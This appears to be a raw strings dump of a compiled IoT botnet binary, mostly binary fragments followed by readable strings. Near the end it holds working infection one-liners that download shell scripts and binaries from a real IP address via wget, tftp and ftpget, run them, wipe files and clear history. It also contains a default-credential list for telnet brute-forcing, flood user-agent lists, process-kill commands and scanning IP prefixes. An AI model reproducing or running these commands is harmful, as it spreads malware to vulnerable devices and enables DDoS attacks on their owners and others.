N^NuNV
f>"y
N^NuNV
N^NuNV
N^NuNV
N^Nu
 OHWHQHy
x @B
3Bp;F
HxT!/.
df .
NqNV
,NqNV
N^NuNV
N^NuNV
_S9)"
N^NuNV
`J$.
N^NuNV
N^NuNV
`  .
N^NuNV
 P .
N^NuNV
p -@
p0-@
`" n
N^NuNV
`L .
N^NuNV
`4 .
sfL".
df:".
xf8".
Xf8".
uf6".
`d n
cfX".
N^NuNV
N^NuNV
N^NuNV
N^NuNV
rf: .
g  .
`4 .
N^NuNV
N^NuNV
`$ .
 @N^NuNV
`. .
N^NuNV
g(p?
g* n
`d n
N^NuNV
N^NuNV
`$ n
N^NuNV
`N .
N^NuNV
 @$6
 @$6
`R 9
LN^NuNV
`V n
g. .
N^NuNV
 @$6
L`FB
L`@B
L`:B
HN^NuNV
`& .
N^NuNV
`j n
`T n
f$ n
`" n
N^NuNV
of .
N^NuNV
B@H@
H@B@
N^NuNV
N^NuNV
N^NuNV
`8 9
`  9
N^NuNV
N^NuNV
`6 n
o` n
`0$.
B@HAH@(
B@HAH@
<N^NuNV
p -@
"H @ 
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
 @$6
hN^NuNV
N^NuNV
`, .
N^NuNV
`l n
f*$.
"@ n
~"@ n
"@ n
gB .
"@$6
g\ .
BP .
f\ .
"P .
/	Hx'
gh .
l< .
"P .
/	Hx'
gh .
l< .
"P .
/	Hx'
"@ n
l< .
"P .
/	Hx'
gh .
l< .
"@ n
"@$9
l\ .
c8 .
 NqNV
0 -|
`| n
"@ n
f*$.
"@ n
"@ n
f" .
f" .
"@ n
gB .
"@$6
g\ .
BP .
f\ .
	^ .
"P .
/	Hx'
gh .
l< .
l< .
"P .
/	Hx'
gh .
l< .
l< .
"P .
/	Hx'
"@ n
"@$9
l< .
"@ n
"@$9
l\ .
c8 .
NqNV
p2-@
|$=@
{^=@
N^NuNV
Do nine men interpret Nine men I nod
f./9
f$ 9
fP 9
f@ 9
f< 9
f@ 9
w: n
gn .
f*/.
uJHy
gb .
g\ .
`` .
gD .
g& .
N^NuNV
N^NuNV
``Hy
`"".
N^NuNV
 @N^NuNV
`. .
alula
`& .
B6	 
`$ n
Zf/.
gn$.
>NqNV
`N 9
`, 9
 @N^NuNV
L @N^NuNV
D @N^NuNV
| @N^NuNV
N^NuNV
N^NuNV
  @N^NuNV
lNHx
xN^NuNV
N^NuNV
N^NuNV
gR n
gF n
,p H@
gH n
p H@
`H n
N^NuNV
d:-@
g  n
f< .
``"n
`,$n
@ P .
gB n
F2 n
f8"n
*/	/
"P n
fX n
N^NuNV
N^NuNV
_v n
m,".
`. 9
gZ 9
oP-n
NqNV
^P n
NqNV
gN n
fB n
N^NuNV
`H n
N^NuNV
N^NuNV
`""9
`$ n
NqNV
"P n
g" n
@f n
g"/.
g  y
N^NuNV
`H/.
o$ .
N^NuNV
< -n
g$ 9
0"H/
PNqNV
NqNV
N^NuNV
N^NuNV
I.Hy
UH-@
`:Hy
E\/.
N^NuNV
N^NuNV
`vHy
N^NuNV
N^NuNV
`6 n
 P (
`  n
N^NuNV
 @N^NuNV
`8 n
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
`$ .
N^NuNV
`N 9
`, 9
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
o( n
o" .
fd .
\pn 
`t/.
f  n
g" n
N^NuNV
o( n
g" n
N^NuNV
N^NuNV
fV n
`l 9
\`Jp
\N^NuNV
| @N^NuNV
N^NuNV
N^NuNV
`N 9
`, 9
 @N^NuNV
 `J n
TN^NuNV
 `J n
TN^NuNV
g" 9
gr .
g> n
o.p@
m& n
l`NJ
oDr@
hN^NuNV
g* .
f:-|
fH n
g$ n
N^NuNV
`B n
N^NuNV
N^NuNV
xgR`
of 9
`N 9
o. 9
|N^NuNV
N^NuNV
N^NuNV
`4p1
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
`N 9
`, 9
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
gD/.
f2 .
N^NuNV
`n n
g* n
f:`8 n
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
| @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
`N 9
`, 9
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
#$N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
f, 9
N^NuNV
gV 9
LN^NuNV
N^NuNV
`n n
`./.
N^NuNV
N^NuNV
`  n
r HA
o:-|
N^NuNV
f( .
f6 9
g* 9
o  9
LN^NuNV
`N^NuNV
^N^NuNV
g4 9
), n
gP n
fD n
N^NuNV
N^NuNV
# N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
p_-@
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
(T-@
p H@
N^NuNV
N^NuNV
N^NuNuNV
| @N^NuNV
N^NuNV
`N 9
`, 9
 @N^NuNV
`( .
c$ n
"P n
N^NuNV
<N^NuNV
"P n
<N^NuNV
<N^NuNV
"P n
g( n
 N^NuNV
N^NuNV
g( n
N^NuNV
g( n
N^NuNV
N^NuNV
`| n
g* n
N^NuNuNV
N^NuNV
`6 n
 P (
`  n
N^NuNV
 @N^NuNV
`8 n
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
p&-@
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
`N 9
`, 9
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
g& n
fp .
g$ .
pn-@
f  n
g: n
f. n
N^NuNV
N^NuNV
g& n
g: n
f. n
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
| @N^NuNV
N^NuNV
N^NuNV
`N 9
`, 9
 @N^NuNV
gZ 9
XN^NuNV
N^NuNV
N^NuNV
N^NuNV
g" n
p	!@
fb 9
mX-n
NqNV
r#-A
g" n
mN .
LN^NuNV
dNqNuNV
` p8
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
m<`  n
`  n
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
p&-@
N^NuNV
#LN^NuNV
`N 9
`, 9
 @N^NuNV
`~ n
`` n
`: n
N^NuNV
N^NuNV
p#-@
`>pn-@
pn-@
N^NuNV
p#-@
N^NuNV
N^NuNV
f0 n
#(Hy
fh 9
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
`N 9
`, 9
 @N^NuNV
`. .
`2 n
"P n
TN^NuNV
NqNV
NqNuNV
`N 9
`, 9
 @N^NuNV
 @N^NuNV
j @N^NuNV
N^NuNV
`\ .
#P 0
 @N^NuNV
`p .
#T-p
g, .
`< .
g& .
N^NuNV
#P 0
`| .
f6Hx
`2".
N^NuNV
#P 0
gd .
f, .
N^NuNV
`Z .
#P 0
fB .
N^Nup
$	"A"/
pxN@"
$	"AJ
NuNV
 A-P
`V-n
p7N@-@
N^NuNV
N@-@
N^NuNV
 A-P
N^NuNuNV
N@-@
N^NuNV
NqNV
p!N@-@
N^NuNV
N@-@
N^NuNV
N^NuNuNV
N@-@
N^NuNV
p?N@-@
N^NuNV
Degas are we not drawn onward no In union drawn onward to new eras aged
N@-@
N^NuNV
pvN@-@
N^NuNV
N^NuNV
N@-@
N^NuNV
N^NuNuNV
N@-@
N^NuNV
p@N@-@
N^NuNV
N@-@
N^NuNuNV
pNN@-@
N^NuNuNV
 A-P
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
<0&n
N@-@
N^NuNV
N^NuNuNV
NqNV
N@-@
N^NuNV
pZN@-@
 @N^NuNV
 @N^NuNV
N@-@
N^NuNV
p[N@-@
N^NuNuNV
N@-@
N^NuNuNV
N@-@
N^NuNV
 A-P
N^NuNV
N^NuNV
 A-P
N^NuNV
N@-@
N^NuNV
p*N@-@
N^NuNuNV
N@-@
N^NuNV
<0&n
N@-@
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
0 $n
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
"	 <
N@-@
N^NuNV
N^NuNuNV
N@-@
N^NuNV
N^NuNV
"	 <
N@-@
N^NuNV
N^NuNuNV
N@-@
N^NuNV
<8&n
N@-@
N^NuNV
pKN@-@
N^NuNuNV
pBN@-@
N^NuNV
`h-n
N@-@
N^NuNV
N@-@
N^NuNV
N^NuNuNV
N@-@
N^NuNuNV
N^NuNV
< $n
"	prN@-@
N^NuNV
N^NuNV
N^NuNuNV
0 $n
N@-@
N^NuNV
N^NuNV
0@-H
N^NuNV
f40|
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
gH n
`, n
N^NuNV
g, n
N^NuNV
God A red nugget A fat egg under a dog
N^NuNV
gV .
o0 .
`<-n
o  .
N^NuNV
o( n
f> n
pW-@
f, n
p,-@
e* n
Tacocat
p7-@
dZ n
-f "n
`. n
gd n
p	-@
f. .
b$ n
0f:p
fn .
fV .
 @-P
>g6 n
`|-|
`D n
f. .
`<".
N^NuNV
lB .
g& .
gh .
o*".
gl n
%gLR
<`"-n
0N^NuNV
p	-@
`P n
%f@R
%g0 n
`$ n
N^NuNV
oH n
N^NuNV
f(0|
f(0|
`v0|
`Z0|
`:2|
`| n
f. n
f. n
lD n
p  n
$_N^NuNuNV
N^NuNV
`,/.
N^NuNV
n  .
$f2J
oF-n
0fp-n
*fZJ
g4 n
f -n
p0-@
r -A
f* n
m,".
F`4 n
N^NuNuNV
c2"n
gV .
fJ/.
g: n
`: .
N^NuNV
N^NuNV
e, .
N^NuNuNV
`R n
`& n
N^NuNV
`H n
N^NuNV
 @N^NuNuNV
H@B@
`l n
 @N^NuNuNV
`, n
H@B@
f* .
`` n
`8 n
N^NuNuNV
N^NuNuNV
N^NuNV
`  n
`f n
`D n
`" n
N^NuNV
gh n
gJ n
g, n
fL-n
`J n
` J.
N^NuNV
`0 n
f"".
`~ n
g\ .
gT .
g>".
g( .
N^NuNuNV
gr`FJ
 @N^NuNV
 @N^NuNV
e2-|
`F".
aT/.
p"-@
g& .
N^NuNV
N^NuNuNV
`t n
g6 n
 @$.
N^NuNuNV
cx/.
 @N^NuNV
N^NuNV
HxT	/.
N^NuNuNV
gn .
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
m,-p
 @N^NuNV
m,-p
N^NuNV
`b".
 @N^NuNV
c|/.
 @N^NuNuNV
N^NuNV
eX/.
 @N^NuNV
X2-P
g$ .
t"-B
t"-B
r"-A
p"-@
p"-@
gH n
c. .
p"-@
`$ .
fl .
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNuNV
gB n
mB .
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
g& .
N^NuNV
lp -@
`^/.
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
b""9
g4 .
gF/.
 @$.
N^NuNV
f>Hy
elHy
 @N^NuNuNV
g"".
`2/.
 @N^NuNuNV
N^NuNV
 @-P
`j/.
f* 9
N^NuNV
elHy
N^NuNuNV
N^NuNV
N^NuNV
`J n
e4".
 @$.
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
`t n
g>".
f& n
`& .
`"/.
 @$.
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
`*"n
fffg"
mf-p
mR-p
gR n
fffg$
N^NuNV
f: n
N^NuNV
N^NuNV
mf-p
mR-p
g*"n
N^NuNV
l:/.
mzHy
m}Hy
N^NuNuNV
N^NuNV
N^NuNuNV
0f*R
`2 n
9~p" 
N^NuNuNV
NqNV
`  n
N^NuNuNV
N^NuNuNV
p -@
(r -A
6^-P
g. .
HN^NuNuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
f&/.
N^NuNV
f8 9
N^NuNV
`>-n
e( n
f" .
gF".
g./<
NqNuNV
N^NuNV
fnHx
g& <
`, <
 @N^NuNV
 @N^NuNV
 @N^NuNV
 @N^NuNV
 @N^NuNV
!* n
N^NuNuNV
N^Nu o
0NuNu"_ <
N@"<
NuNV
"	pfN@-@
N^NuNuNV
80&n
N@-@
N^NuNuNV
0 $n
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
`,-y
 @N^NuNuNV
0@-H
N^NuNV
Cl @N^NuNV
N^NuNV
N^NuNuNV
`L n
`T n
N^NuNuNV
N^NuNV
g| .
N^NuNuNV
fh n
gx .
g: .
`D n
N^NuNuNV
f. n
f, n
fj n
g@ n
N^NuNuNV
mp .
`h .
`F n
0@-H
N^NuNuNV
N^NuNV
`$".
N^NuNuNV
`J n
p !@
tp-B
r	-A
gl .
`h .
`2 .
f8$.
o(Hx
m& .
mL n
oP n
o  n
o& n
l, n
g$ n
gF$.
l4 .
fffg"
fffg$
ov n
g* n
`< n
"P n
`" n
N^NuNuNV
f0p8
N^NuNuNV
H@B@
gn .
`r n
`X n
 @N^NuNV
`~ n
`@ n
N^NuNV
`b n
N^NuNV
 @N^NuNV
 @N^NuNuNV
H@B@
gj-n
`l n
`R n
N^NuNuNV
`R-n
 @N^NuNuNV
`2-n
 @N^NuNuNV
g0 n
 P h
N^NuNV
 @-P
f8Hx
f*Hx
g: n
f, n
g  n
 P h
`R .
"@ n
 P h
"P n
N^NuNuNV
, @ 
N^NuNV
N^NuNV
N^NuNV
m80.
lN^NuNV
J@f>Hx
"@ AP
/	HxT!/
 @N^NuNV
Hx"`Hx"`/.
 @N^NuNV
X @ 
X$@ n
`j n
$H n
`H$n
`( n
$H n
N^NuNV
N^NuNV
"@ n
X @ 
g6 n
 P h
f  .
f0 n
mR .
`f n
f> n
X @ 
fd n
 P h
gV n
o0 n
 P h
N^NuNuNV
N^NuNuNV
q|Hx
g& n
N^NuNV
gJ .
g2 .
N^NuNV
eZ .
`L n
`B n
`8 n
`. n
`$ n
N^NuNV
`( n
N^NuNV
g.`B n
`. n
g4p	
`T n
`2 n
`  n
N^NuNV
fx .
gb .
gJ .
N^NuNV
`n n
g:`R .
`8 .
N^NuNV
gT .
g< n
N^NuNV
N^NuNV
g( .
N^NuNV
`x n
g"`X n
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @-P
`* n
 @N^NuNV
h(!@
&`6A
 @-P
`z n
fb n
<N^NuNV
Mz-@
`N n
`" .
N^NuNV
N^NuNV
gR .
 @"n
N^NuNV
 @-P
N^NuNV
g0 n
N^NuNV
0  n
$H .
N^NuNV
`~ .
g^ n
J@gRR
jN^NuNV
0  n
$H .
N^NuNV
h(!@
m" .
N^NuNV
N^NuNuNV
N^NuNV
`, n
c\/.
`f n
g> n
N^NuNuNV
N^NuNV
N^NuNV
`@ n
 P/.
N^NuNV
gd`j n
0@-H
`B n
`  .
N^NuNV
N^NuNV
gV`\ n
`> .
`, n
N^NuNV
N^NuNV
fx n
g& n
`f .
N^NuNV
fv n
g& n
`l .
N^NuNV
N^NuNV
N^NuNV
gj`p n
`B n
`  .
N^NuNV
N^NuNV
N^NuNV
`X n
`6 .
N^NuNV
N^NuNV
`h n
`2 n
r	/.
N^NuNV
`r n
`0 n
f  n
N^NuNV
`H .
N^NuNV
N^NuNV
`@/.
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
`& n
N^NuNV
e6 n
 @N^NuNV
`F n
$@ n
N^NuNV
`F n
$@ n
N^NuNV
`F n
N^NuNV
`F n
N^NuNV
`L n
N^NuNV
`L n
N^NuNuNV
`> .
`| n
`> .
N^NuNuNV
mH 9
o<Hx
r6/.
hL 0
:` Hx
gb <
` /.
g  n
fj n
g` <
`" .
gZ <
N^NuNV
r8Hy
r8Hy
g( n
g@ n
g4 n
`:$9
hh .
gX .
`< 9
hl 9
hL 0
`:$9
hl .
HN^NuNV
$N^NuNuNV
f"/.
 @-P
g& .
bHHy
 @N^NuNV
N^NuNV
N^NuNV
`\".
b0 .
f6 n
e*/.
N^NuNuNV
p -@
f4Hx
f6 9
f~ 9
p -@
NqNuNV
N^NuNuNV
`4 n
N^NuNuNV
N^NuNV
g*`J n
g> n
`" n
N^NuNV
lP 9
 @$.
N^NuNV
hp0|
htN^NuNV
p-N@-@
N^NuNV
`r n
"@ n
e. n
 @N^NuNuNV
f40|
CpHx
CtHx
N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
f40|
md n
N^NuNuNV
gv n
N^NuNV
rgd-|
wgP-|
ag<a
g$ n
fDHx
ml n
fZHx
g( n
 @$.
N^NuNV
N^NuNuNV
f40|
 @N^NuNuNV
f40|
N^NuNV
`p n
Ct 9
CpHx
N^NuNV
CpHx
g40|
f8/.
f" n
(`N n
g8/.
f" n
N^NuNV
c4"n
f``R/.
fH`. .
 @N^NuNuNV
g, n
`d n
g" .
g" .
g" .
g  .
`R n
g  .
N^NuNV
g8 n
g"".
g"".
g"".
g ".
`p n
g ".
N^NuNV
"`L n
`J n
N^NuNV
H@B@
`N n
`4 n
 @N^NuNuNV
`* n
 @N^NuNuNV
`@-n
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @-P
`, n
N^NuNV
 @-P
f8Hx
 @N^NuNuNV
gl .
g<"<
N^NuNuNV
`  n
J@fVa
8pb 
`b09
N^NuNV
m>0.
gl n
f^0.
"@ A 
`:r 
N^NuNV
`r-n
N^NuNV
N^NuNuNV
N^NuNV
`,Hx
N^NuNV
gf`lJ
`&Hx
N^NuNV
lnr9
mf n
`2p.
`L n
N^NuNV
g: .
fv-n
`8p.
f( .
g6 .
gh".
`0 .
N^NuNV
`, .
`& .
N^NuNV
B@H@
0fb"n
B@H@
B@H@
0fTS
`N"n
B@H@
B@H@
B@H@
 @$.
N^NuNV
`J".
"@ .
`f .
f$ .
`> .
`2 .
g( .
g" .
g6 .
n, .
fn .
ff .
fR .
fF .
`0 .
sG/.
 @N^NuNV
g `< .
`, .
 @N^NuNuNV
N^NuNuNV
N^NuNV
`l n
N^NuNuNV
N^NuNV
H@B@
N^NuNV
s[Hy
s[Hy
 @N^NuNV
g$ .
p"-@
p"-@
p"-@
p"-@
p"-@
p"-@
r"-A
g( n
g( n
N`Br
`$ .
fz n
o\ n
fx n
oZ n
N^NuNV
N^NuNV
g( n
H@B@-@
B@HAH@0
<N^NuNuNV
N^NuNuNV
c& n
g: n
S@ n
g& n
gT n
gb n
`4Hx
N^NuNV
g@ n
N^NuNV
`8 .
u& 0
u* 0
 @N^NuNV
`8 .
t  0
t$ 0
t`-A
 @N^NuNV
N^NuNV
N^NuNV
$@Hx
 @$n
N^NuNV
`jHy
 @N^NuNV
N^NuNV
g$/.
`Z .
`, .
 @N^NuNV
N^NuNV
N^NuNV
f8J.
N^NuNV
`Rp?F
`0 .
N^NuNuNV
fd .
N^NuNuNV
N^NuNuNV
f. n
f, n
`Z n
g0/.
N^NuNuNV
N^NuNV
N^NuNuNV
N^Nu107.155.75.69
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.155.75.69/ddos.sh; chmod 777 ddos.sh; sh ddos.sh; tftp 107.155.75.69 -c get trap1.sh; chmod 777 trap1.sh; sh trap1.sh; tftp -r trap2.sh -g 107.155.75.69; chmod 777 trap2.sh; sh trap2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.155.75.69 tra1.sh tra1.sh; sh tra1.sh; rm -rf ddos.sh trap1.sh trap2.sh tra1.sh; rm -rf *;history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.155.75.69/ddos.sh; chmod 777 ddos.sh; sh ddos.sh; tftp 107.155.75.69 -c get trap1.sh; chmod 777 trap1.sh; sh trap1.sh; tftp -r trap2.sh -g 107.155.75.69; chmod 777 trap2.sh; sh trap2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.155.75.69 tra1.sh tra1.sh; sh tra1.sh; rm -rf ddos.sh trap1.sh trap2.sh tra1.sh; rm -rf *
cd /tmp; wget http://107.155.75.69/kittyphones -O phone; chmod 777 phone; ./phone;wget http://107.155.75.69/pl0xmipsel -O pl0xmipsel; chmod 777 pl0xmipsel; ./pl0xmipsel; rm -rf phone pl0xmipsel
admin
user
root
guest
telnet
cisco
netgear
oracle
support
cusadmin
1234
raspberry
password
alpine
maxided
1111
anko
ogin
sername
assword
Linux
9615-cdp
user
name
pass
dvrdvs
mdm9625
F600
F660
F609
nvalid
ailed
ncorrect
enied
rror
oodbye
BusyBox
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
nwonknu
unknown
hello
slammed
Machines
Dank
Layer4
hhfdhkhbhcace
flood
ugiydg
IOHEDU9S
SIAHDIYSGBILC
DSFDD
DVAS
EFFAESF
uhdusaibxi
OIEDNBOUBAS
WQIJOIWENASO
pkpinasoubc
wubihbdc
inopxuob
wubiddsd
savduhvaU
UHyig732vgux
UByovoouds
saybuyyyywugav
sdjbciysvhdaocu
dsibciwveas
dsygc8y32723
tydjtr
tfkyt
rsyreg
HCKG
uibeiubf
YRXDJR
YIFUKT
YCJYRX
7TUFF
dsgdf
idsh
gffag
gfdag
fgadf
fbafdb
fbbbf
dfbdfb
fdbxb
BEDROLL
BEDSORE
BEETLED
BEETLES
BEHESTS
BEHOLDS
BENDERS
DELETES
DEBTORS
DUSTERS
ENSURED
EYELESS
EYELETS
HOLSTER
HUNTERS
LENDERS
HOTBEDS
LUSHEST
sudo
http
request
socket
create
Merry
holidays
vdeubhs
G8WGVSI
VUSAVXU
28H9UgBGvv
IYVkhj
uiVU
super
26736
18h3b2
Kekz
wrecked
Unix
Strings
Manipulation
Command
Line
edew
apt-get
ewdb
ubed
iyvugvjvkh
HBiug655
KJYDFyljf754
hbjhvihk
guygiuov
ugyi
iyfutvugjiu
hbivutfyrfvg
uivyuivug
khvihvgiug
jbihvbig
ubihkbvihyvigv
bivhkb
vejvbboqi
vobqre
odupubw
ftyduiy
hbilyfutdi
78tgyuhkbjg
tudiryxcvi
iygcduy
RTRTWFNJ
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
6mD4Q
Ck0Zt
6T1bg
joNuc
v9SNj
Fm74C
pXVcb
w472Y
vn6PH
Ycy7z
EraqpCtc
eQE9VqOO
0I2tFegb
c9vSbX37
HzullcDD
sQT6GUpo
SE5iiTRL
8YnpVkqQ
P4ZFrN8y
ZaygGQWy
4b9hcI2E0ob
NbOwbHGP1sv
Hot98t9cA1C
SmosSnBu3UI
6LhO2mqIaG2
wFKTDkBE12q
wr5RiFwx0oe
bKJDMfvjRK2
CXaCtbYiETK
HRvlWcOcb8v
SozDWxWE2jAWgGv
LO53SCJbVwKjAta
M6qlcepTThrOhl3
s4VIALs5l0Murlt
eHj9MDyMU2PoJ32
aLQP6OWncMD8Pq7
1zoihgOpu92HLUz
wZU4i9GsFjT3DXt
8SqliubwCJDq9fg
NBLlKNISq52KJNr
uewbdih
wqodbpdwdqw
iqhdpuqhwb
ping %s -s %s -i %s -w %s
mips
mips64
mipsel
sh2eb
sh2elf
armv5
armv4tl
armv4
armv6
i686
powerpc
powerpc440fp
i586
m68k
sparc
x86_64
jackmymips
jackmymips64
jackmymipsel
jackmysh2eb
jackmysh2elf
jackmysh4
jackmyx86
jackmyarmv5
jackmyarmv4tl
jackmyarmv4
jackmyarmv6
jackmyi686
jackmypowerpc
jackmypowerpc440fp
jackmyi586
jackmym68k
jackmysparc
jackmyx86_64
hackmymips
hackmymips64
hackmymipsel
hackmysh2eb
hackmysh2elf
hackmysh4
hackmyx86
hackmyarmv5
hackmyarmv4tl
hackmyarmv4
Borrow or rob
hackmyarmv6
hackmyi686
hackmypowerpc
hackmypowerpc440fp
hackmyi586
hackmym68k
hackmysparc
hackmyx86_64
busyboxterrorist
DFhxdhdf
dvrHelper
FDFDHFC
FEUB
FTUdftui
GHfjfgvj
jhUOH
JIPJIPJj
JIPJuipjh
kmymips
kmymips64
kmymipsel
kmysh2eb
kmysh2elf
kmysh4
kmyx86
kmyarmv5
kmyarmv4tl
kmyarmv4
kmyarmv6
kmyi686
kmypowerpc
kmypowerpc440fp
kmyi586
kmym68k
kmysparc
kmyx86_64
lolmips
lolmips64
lolmipsel
lolsh2eb
lolsh2elf
lolsh4
lolx86
lolarmv5
lolarmv4tl
lolarmv4
lolarmv6
loli686
lolpowerpc
lolpowerpc440fp
loli586
lolm68k
lolsparc
RYrydry
telmips
telmips64
telmipsel
telsh2eb
telsh2elf
telsh4
telx86
telarmv5
telarmv4tl
telarmv4
telarmv6
teli686
telpowerpc
telpowerpc440fp
teli586
telm68k
telsparc
telx86_64
TwoFacemips
TwoFacemips64
TwoFacemipsel
TwoFacesh2eb
TwoFacesh2elf
TwoFacesh4
TwoFacex86
TwoFacearmv5
TwoFacearmv4tl
TwoFacearmv4
TwoFacearmv6
TwoFacei686
TwoFacepowerpc
TwoFacepowerpc440fp
TwoFacei586
TwoFacem68k
TwoFacesparc
TwoFacex86_64
UYyuyioy
XDzdfxzf
xxb1
xxb2
xxb3
xxb4
xxb5
xxb6
xxb7
xxb8
xxb9
xxb10
xxb11
xxb12
xxb13
xxb14
xxb15
xxb16
xxb17
xxb18
xxb19
xxb20
busybotnet
pppd
pppoe
wput
kill -9 $(pidof %s)
kill -9 $(pidof busybox
history -c
kill -9 %s
(null)
/bin/sh
PING
gethostbyname
:>%$#
%d.%d.%d.%d
112.5.%d.%d
117.165.%d.%d
85.3.%d.%d
41.252.%d.%d
104.55.%d.%d
78.186.%d.%d
78.189.%d.%d
221.120.%d.%d
88.5.%d.%d
41.254.%d.%d
103.20.%d.%d
103.47.%d.%d
103.57.%d.%d
45.117.%d.%d
101.51.%d.%d
137.59.%d.%d
14.204.%d.%d
27.50.%d.%d
27.54.%d.%d
27.98.%d.%d
36.32.%d.%d
36.248.%d.%d
39.64.%d.%d
43.253.%d.%d
43.230.%d.%d
163.53.%d.%d
43.245.%d.%d
123.25.%d.%d
103.54.%d.%d
27.255.%d.%d
103.204.%d.%d
123.24.%d.%d
113.191.%d.%d
113.188.%d.%d
113.189.%d.%d
14.160.%d.%d
14.161.%d.%d
14.162.%d.%d
14.163.%d.%d
14.164.%d.%d
14.165.%d.%d
14.166.%d.%d
14.167.%d.%d
14.168.%d.%d
14.169.%d.%d
14.170.%d.%d
14.171.%d.%d
14.172.%d.%d
14.173.%d.%d
14.174.%d.%d
14.175.%d.%d
14.176.%d.%d
14.177.%d.%d
14.178.%d.%d
14.179.%d.%d
